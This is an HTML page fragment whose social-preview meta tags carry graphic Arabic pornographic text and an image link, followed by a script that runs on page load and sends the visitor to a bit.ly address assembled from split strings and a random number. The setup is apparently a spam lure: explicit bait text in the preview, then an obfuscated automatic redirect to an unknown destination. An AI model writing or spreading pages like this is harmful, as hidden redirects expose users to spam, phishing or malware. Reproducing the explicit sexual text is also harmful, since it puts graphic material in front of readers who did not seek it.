<meta property="og:title" content="جديد لانج">

<meta property="og:description" content="
                                         
                                         

اااه اححح اااه طلعه من طيزى وجعتنى سواق شرقا صايد فلاحه على الطريق الزراعى يركبها خلفى يهرى كوسها وطيزها نيك بزبه الطخين
">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://dc577.4shared.com/img/0WG-X28Eea/s24/170afb16b08

 "> 

<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pree";
c = location.href = "edjv";
d = Math.ceil(Math.random() * 12);
a = "http://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
